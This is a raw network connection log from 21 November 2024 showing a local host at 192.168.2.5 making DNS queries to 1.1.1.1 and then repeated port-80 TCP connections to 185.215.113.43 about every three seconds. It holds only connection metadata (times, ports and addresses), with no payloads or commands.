Nov 21, 2024 22:16:35.593707085 CET	50104	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:35.713293076 CET	53	50104	1.1.1.1	192.168.2.5
Nov 21, 2024 22:16:36.011507988 CET	49833	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:36.011507034 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:36.131278038 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:36.131412029 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:36.131885052 CET	80	49833	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:36.131922007 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:36.132036924 CET	49833	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:36.252619028 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:36.725493908 CET	50104	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:36.845686913 CET	53	50104	1.1.1.1	192.168.2.5
Nov 21, 2024 22:16:36.845756054 CET	50104	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:16:37.520129919 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:37.520270109 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:39.027564049 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:39.027936935 CET	50106	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:39.147735119 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:39.147767067 CET	80	50106	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:39.147823095 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:39.147851944 CET	50106	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:39.148222923 CET	50106	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:39.267688990 CET	80	50106	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:40.484082937 CET	80	50106	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:40.484164000 CET	50106	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:42.104628086 CET	50106	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:42.105779886 CET	50107	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:42.224989891 CET	80	50106	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:42.225307941 CET	80	50107	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:42.225450993 CET	50107	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:42.225471020 CET	50106	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:42.225697041 CET	50107	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:42.345258951 CET	80	50107	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:43.659493923 CET	80	50107	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:43.659616947 CET	50107	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:45.168750048 CET	50107	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:45.169157982 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:45.288765907 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:45.288806915 CET	80	50107	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:45.288849115 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:45.288882971 CET	50107	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:45.289169073 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:45.408809900 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:46.717390060 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:46.717458963 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:48.339380980 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:48.339766026 CET	50109	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:48.459587097 CET	80	50109	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:48.459673882 CET	50109	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:48.459904909 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:48.459959030 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:48.460131884 CET	50109	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:48.579629898 CET	80	50109	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:49.800642967 CET	80	50109	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:49.800726891 CET	50109	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:51.310050964 CET	50109	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:51.310409069 CET	50111	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:51.431371927 CET	80	50111	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:51.431510925 CET	80	50109	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:51.431627989 CET	50109	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:51.431627989 CET	50111	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:51.431898117 CET	50111	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:51.554043055 CET	80	50111	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:52.872534037 CET	80	50111	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:52.872895956 CET	50111	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:54.496454954 CET	50111	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:54.497188091 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:54.616374969 CET	80	50111	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:54.616471052 CET	50111	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:54.616652012 CET	80	50112	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:54.616864920 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:54.617069006 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:54.736623049 CET	80	50112	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:56.003976107 CET	80	50112	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:56.007436991 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:57.511133909 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:57.511135101 CET	50113	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:57.630840063 CET	80	50113	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:57.630992889 CET	80	50112	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:57.631567955 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:57.631568909 CET	50113	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:57.635389090 CET	50113	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:16:57.755599976 CET	80	50113	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:59.069242001 CET	80	50113	185.215.113.43	192.168.2.5
Nov 21, 2024 22:16:59.069310904 CET	50113	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:00.699939966 CET	50113	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:00.700390100 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:00.819799900 CET	80	50113	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:00.819822073 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:00.819866896 CET	50113	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:00.819931984 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:00.820262909 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:00.940310955 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:02.177285910 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:02.177704096 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:03.682487965 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:03.683036089 CET	50115	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:03.802572012 CET	80	50115	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:03.803385973 CET	80	50114	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:03.803451061 CET	50115	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:03.803508997 CET	50114	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:03.805797100 CET	50115	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:03.925354958 CET	80	50115	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:05.169961929 CET	80	50115	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:05.170018911 CET	50115	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:06.793500900 CET	50115	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:06.793904066 CET	50116	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:06.913480997 CET	80	50116	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:06.913497925 CET	80	50115	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:06.913583994 CET	50116	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:06.913602114 CET	50115	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:06.913929939 CET	50116	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:07.033508062 CET	80	50116	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:08.315731049 CET	80	50116	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:08.319499016 CET	50116	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:09.824270964 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:09.824327946 CET	50116	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:09.944140911 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:09.944292068 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:09.944452047 CET	80	50116	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:09.944502115 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:09.944555998 CET	50116	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:10.064038038 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:11.527740002 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:11.531764030 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:13.152896881 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:13.153323889 CET	50118	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:13.273848057 CET	80	50117	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:13.273869038 CET	80	50118	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:13.273902893 CET	50117	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:13.273958921 CET	50118	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:13.274408102 CET	50118	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:13.398032904 CET	80	50118	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:14.608871937 CET	80	50118	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:14.608949900 CET	50118	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:16.120378017 CET	50118	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:16.120774031 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:16.240583897 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:16.240725994 CET	80	50118	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:16.240773916 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:16.240808010 CET	50118	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:16.241905928 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:16.361388922 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:17.639616966 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:17.639751911 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:19.261369944 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:19.261739016 CET	50120	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:19.381516933 CET	80	50119	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:19.381551981 CET	80	50120	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:19.381577015 CET	50119	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:19.381661892 CET	50120	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:19.381968975 CET	50120	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:19.501570940 CET	80	50120	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:20.758619070 CET	80	50120	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:20.758692026 CET	50120	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:22.277132988 CET	50120	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:22.277149916 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:22.396883965 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:22.397186041 CET	80	50120	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:22.399503946 CET	50120	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:22.399507046 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:22.399816036 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:22.519332886 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:23.796700954 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:23.797929049 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:25.403075933 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:25.403604031 CET	50122	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:25.523195982 CET	80	50121	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:25.523292065 CET	80	50122	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:25.523350000 CET	50121	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:25.523474932 CET	50122	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:25.523941994 CET	50122	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:25.643543005 CET	80	50122	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:26.969540119 CET	80	50122	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:26.969614983 CET	50122	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:28.479993105 CET	50122	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:28.480326891 CET	50123	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:28.599881887 CET	80	50123	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:28.599988937 CET	50123	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:28.600061893 CET	80	50122	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:28.600169897 CET	50122	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:28.600280046 CET	50123	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:28.719754934 CET	80	50123	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:29.992561102 CET	80	50123	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:29.993690968 CET	50123	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:31.604355097 CET	50123	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:31.604366064 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:31.724055052 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:31.724340916 CET	80	50123	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:31.727576971 CET	50123	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:31.727587938 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:31.731450081 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:31.851103067 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:33.115369081 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:33.115436077 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:34.620968103 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:34.621413946 CET	50125	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:34.742755890 CET	80	50124	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:34.742788076 CET	80	50125	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:34.742816925 CET	50124	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:34.742882967 CET	50125	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:34.743125916 CET	50125	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:34.862917900 CET	80	50125	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:36.089310884 CET	80	50125	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:36.091547966 CET	50125	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:37.698749065 CET	50125	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:37.699083090 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:37.818608999 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:37.818733931 CET	80	50125	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:37.818823099 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:37.818933010 CET	50125	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:37.819191933 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:37.938981056 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:39.242203951 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:39.242295980 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:40.762310982 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:40.762662888 CET	50127	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:40.882814884 CET	80	50127	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:40.882931948 CET	80	50126	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:40.882924080 CET	50127	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:40.882997036 CET	50126	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:40.883635044 CET	50127	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:41.003289938 CET	80	50127	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:42.264595985 CET	80	50127	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:42.264735937 CET	50127	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:43.870404959 CET	50128	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:43.870414972 CET	50127	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:43.990186930 CET	80	50128	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:43.990447044 CET	50128	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:43.990595102 CET	80	50127	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:43.990715981 CET	50127	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:43.990989923 CET	50128	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:44.111140966 CET	80	50128	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:45.368248940 CET	80	50128	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:45.368305922 CET	50128	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:46.886590958 CET	50128	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:46.886928082 CET	50129	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:47.006566048 CET	80	50129	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:47.006644011 CET	50129	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:47.006733894 CET	80	50128	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:47.006787062 CET	50128	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:47.006912947 CET	50129	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:47.126615047 CET	80	50129	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:48.403599977 CET	80	50129	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:48.405558109 CET	50129	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:50.027910948 CET	50129	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:50.028402090 CET	50130	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:50.148540974 CET	80	50129	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:50.148565054 CET	80	50130	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:50.148664951 CET	50129	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:50.148706913 CET	50130	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:50.148983002 CET	50130	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:50.269100904 CET	80	50130	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:51.555434942 CET	80	50130	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:51.559570074 CET	50130	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:53.074189901 CET	50130	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:53.074596882 CET	50131	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:53.194228888 CET	80	50131	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:53.194303989 CET	50131	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:53.194356918 CET	80	50130	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:53.194405079 CET	50130	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:53.194601059 CET	50131	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:53.315156937 CET	80	50131	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:54.578217030 CET	80	50131	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:54.578282118 CET	50131	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:54.711925983 CET	50131	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:54.834441900 CET	80	50131	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:54.834503889 CET	50131	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:56.201497078 CET	50134	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:56.321093082 CET	80	50134	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:56.321894884 CET	50134	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:56.321894884 CET	50134	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:56.441447020 CET	80	50134	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:57.699136972 CET	80	50134	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:57.701616049 CET	50134	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:59.215203047 CET	50134	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:59.215538979 CET	50136	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:59.335068941 CET	80	50136	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:59.335143089 CET	50136	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:59.335344076 CET	80	50134	185.215.113.43	192.168.2.5
Nov 21, 2024 22:17:59.335412979 CET	50134	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:59.335553885 CET	50136	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:17:59.455952883 CET	80	50136	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:00.772962093 CET	80	50136	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:00.773154020 CET	50136	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:02.401153088 CET	50136	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:02.401158094 CET	50137	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:02.520771027 CET	80	50137	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:02.520842075 CET	50137	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:02.521083117 CET	80	50136	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:02.521106005 CET	50137	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:02.521136045 CET	50136	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:02.640738010 CET	80	50137	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:03.948764086 CET	80	50137	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:03.949803114 CET	50137	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:05.462378979 CET	50137	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:05.462621927 CET	50138	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:05.582164049 CET	80	50138	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:05.582263947 CET	80	50137	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:05.582298040 CET	50138	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:05.582392931 CET	50137	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:05.582566023 CET	50138	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:05.702219963 CET	80	50138	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:07.011620998 CET	80	50138	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:07.011751890 CET	50138	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:08.640995026 CET	50138	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:08.641258955 CET	50139	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:08.761286974 CET	80	50139	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:08.761365891 CET	80	50138	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:08.761404991 CET	50139	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:08.761502981 CET	50138	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:08.761729956 CET	50139	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:08.883088112 CET	80	50139	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:10.107698917 CET	80	50139	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:10.107815981 CET	50139	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:11.615693092 CET	50139	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:11.615942955 CET	50140	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:11.735588074 CET	80	50140	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:11.735650063 CET	80	50139	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:11.735706091 CET	50140	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:11.735858917 CET	50139	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:11.735997915 CET	50140	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:11.855470896 CET	80	50140	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:13.136445999 CET	80	50140	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:13.136617899 CET	50140	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:14.762070894 CET	50140	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:14.762484074 CET	50141	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:14.882215023 CET	80	50140	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:14.882292986 CET	80	50141	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:14.882514954 CET	50140	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:14.882522106 CET	50141	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:14.882879019 CET	50141	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:15.002372980 CET	80	50141	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:16.269908905 CET	80	50141	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:16.269979954 CET	50141	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:17.773653030 CET	50141	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:17.773984909 CET	50142	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:17.894706011 CET	80	50142	185.215.113.43	192.168.2.5
Nov 21, 2024 22:18:17.894785881 CET	50142	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:18:17.894845963 CET	80	50141	185.215.113.43	192.168.2.5
